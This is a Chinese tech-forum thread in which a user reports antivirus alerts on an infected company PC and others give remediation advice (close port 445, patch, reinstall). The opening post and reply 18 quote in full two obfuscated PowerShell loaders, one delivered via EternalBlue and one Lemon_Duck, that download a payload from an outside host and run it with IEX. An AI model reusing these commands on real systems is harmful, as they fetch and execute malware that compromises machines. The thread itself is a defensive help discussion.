这是一个创建于 2104 天前的主题,其中的信息可能已经有所发展或是发生改变。
操作进程:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
命令行:powershell -c "try{$localIf=$flase;New-Object Threading.Mutex($true,'Global\eLocalIf',[ref]$localIf)}catch{};$ifmd5='1cd2db7421c0b88eb89eb6182bd6785e';$ifp=$env:tmp+'\if.bin';$down_url='http://207.154.225.82';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)|foreach{$s+=$.ToString('X2')};return $s}if(test-path $ifp){$con=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(New-Object Net.WebClient)."downloaddata"($down_url+'/if.bin?SZXHRZZLIT036&9CBD7D74-E8C3-6E51-230D-12457CECDB29&DC:4A:3E:76:02:A0');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}IEX(-join[char[]]$con)"
攻击方式:Exploit/EternalBlue
远程地址:10.83.3.33:445
防御结果:已阻止
37 条回复 2020-05-20 22:06:07 +08:00
 | 1 BrettD 2020-02-28 14:27:36 +08:00 via iPhone 勒索软件的感觉 |
 | 2 shadowyue OP http://207.154.225.82 这个地址我还能访问,是个 nginx |
 | 3 crab 2020-02-28 14:29:59 +08:00 局域网没打那补丁? |
 | 4 phpinfos 2020-02-28 14:30:53 +08:00 永恒之蓝 445 端口关掉 打补丁 |
| 7 phpinfos 2020-02-28 14:35:11 +08:00 |
 | 8 Osk 2020-02-28 14:36:48 +08:00 看这样子怎么像 smb v1 的漏洞补丁没打? |
| 9 Osk 2020-02-28 14:38:24 +08:00 不需要共享打印机和文件夹的话可以先在防火墙里面把本机的 445 等 smb service 端口关闭了,毕竟看样子你是在毒窝里面了 |
| 10 shadowyue OP 淦哦,公司 win10 没法更新补丁 |
| 12 shadowyue OP it 说自己杀毒就行,一直都有这个病毒 |
| 13 Osk 2020-02-28 14:59:04 +08:00 @shadowyue 永恒之蓝在没打补丁或做防护措施的局域网中传播很快的。 win7, win8, win 10 <1703 (好像是这个版本)都会中招。很好奇 win 10 没法更新补丁是什么情况? win10 打补丁比 win7 方便多了,只需要去下载最近的月度累计更新手动安装也很方便。 作为用户,不想打补丁就先把本机的 445、135、137、138、139 端口关闭了,除非你需要共享打印机或者文件给别人。毕竟万一火绒没拦住就惨了 |
| 14 Osk 2020-02-28 15:00:50 +08:00 另外,看你们内网的 ip 都是 10 的,看起来是大公司了,it 都这么水吗 /doge/ |
| 15 shadowyue OP @Osk 公司好像没几个人用 win10,我更新一直都是提示失败了,不知道为啥。 我被攻击了 powershell 这个程序就疯狂跑吃 cpu,好奇别人没这个问题吗,电脑卡爆了应该有别人反馈才对。 公司是蛮大的,工作累了直接睡,没问题 |
| 16 Osk 2020-02-28 15:15:44 +08:00 公司上外网需要使用代理吗? 吃 cpu 而不搞你的文件的话,看起来像挖矿的程序,危害也。。。不大吧 /滑稽 / |
| 17 shadowyue OP @Osk 不用,但是禁止了一些娱乐网站,我自己挂代理可以浏览,哈哈 按你说的吧 445 端口关闭了,貌似已经没问题了,谢谢你 |
| 18 shadowyue OP @Osk 大佬救救我,这又是啥 操作进程:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE 命令行:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -c "$Lemon_Duck='1EdJ95\kmSXYuMOLF1';$x='t.awc'+'na.com';;$y='http://'+$x+'/x.js';$z=$y+'p?ipc_20200228';$m=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($y);[System.Security.Cryptography.MD5]::Create().ComputeHash($m)|foreach{$s+=$_.ToString('x2')};if($s-eq'a49add2a8eeb7e89b9d743c0af0e1443'){IEX(-join[char[]]$m)}" 风险分类:木马盗号 访问网址:t.awcna.com/x.js 操作结果:已阻止 |
 | 19 Shazoo 2020-02-28 15:55:40 +08:00 下载 http://t.awcna.com/x.js ,如果程序的 md5=a49add2a8eeb7e89b9d743c0af0e1443,执行之。 https://x.threatbook.cn/nodev4/domain/awcna.com 看看细节呗。 |
| 20 Osk 2020-02-28 15:56:58 +08:00 @shadowyue 看来一开始火绒并没有拦住病毒。。。先把 powershell 进程结束了看是否再生,建议断网杀毒。必要的话重装了。 |
 | 23 ThirdFlame 2020-02-28 16:07:45 +08:00  1 你的电脑已经被控制了。 通过 powershell 执行恶意代码 ing |
| 24 shadowyue OP @ThirdFlame 怎么处理啊,大佬 |
 | 25 WordTian 2020-02-28 16:26:55 +08:00 via Android 备份好重要文件,重装系统吧,联网前关掉 445 端口 |
 | 26 juded 2020-02-28 16:32:20 +08:00 火绒行为管理不错,但查杀能力太差了。 |
 | 27 vocaloid 2020-02-28 16:37:37 +08:00 把 powershell 进程先杀掉啊。。要不还会干更多的事情 |
 | 28 ihacku 2020-02-28 16:46:08 +08:00 via iPhone 这个动作本身已经被拦截了 你没有打补丁,可以在火绒里面打下补丁重启生效 可以通知 IT 发下 10.83.3.33 这台机器中毒了 杀毒打补丁 内网应该不止这一台被感染的 |
| 29 Osk 2020-02-28 16:51:26 +08:00 @shadowyue 那我还是建议重装了, 如果非要清理, 最好进入离线系统, 使用其它杀毒软件对 C 盘全盘扫描, 离线的原因是避免恶意程序对自身做隐藏或者干扰. 查杀完成后, 还需要在离线系统(干净的 PE 中)使用 autoruns 等工具对所有的 驱动, 服务, 自启动等项目手工排查, 一些恶意程序隐藏的很好, 我觉得这一步是必须的. 最后问题来了: 都这么麻烦了, 还不如重装. 重装后: 先不要联网, 防火墙关闭 smb v1(445), rdp(3389) 等端口, 不然处在毒窝中分分钟死灰复燃. 不过, 使用最新的 Windows 10 1909 镜像也不要太紧张, 大部分局域网传播的严重漏洞已经封好了. |
 | 30 wanguorui123 2020-02-28 17:07:42 +08:00 永恒之蓝的变种蠕虫病毒有点多 |
 | 31 Ailoli 2020-02-28 18:34:22 +08:00 之前公司同事电脑出现过,后面断网全盘查杀就解决了 |
 | 32 jousca 2020-02-28 18:37:07 +08:00 内网里攻击你那台电脑中了蠕虫,永恒之蓝漏洞。 |
 | 33 manami 2020-02-28 18:40:27 +08:00 via Android 你需要卡巴斯基! |
 | 34 Buges 2020-02-28 18:45:28 +08:00 via Android |
 | 35 emptyiscolor 2020-02-29 11:15:11 +08:00 @shadowyue 利用驱动人生后门进行传播的木马,建议直接重装系统然后安装主流杀软吧 |
 | 36 zdswater 2020-05-20 22:05:44 +08:00 中奖了,火绒扫了一遍杀了还有。不知道咋处理了 |
| 37 zdswater 2020-05-20 22:06:07 +08:00 |
Select Language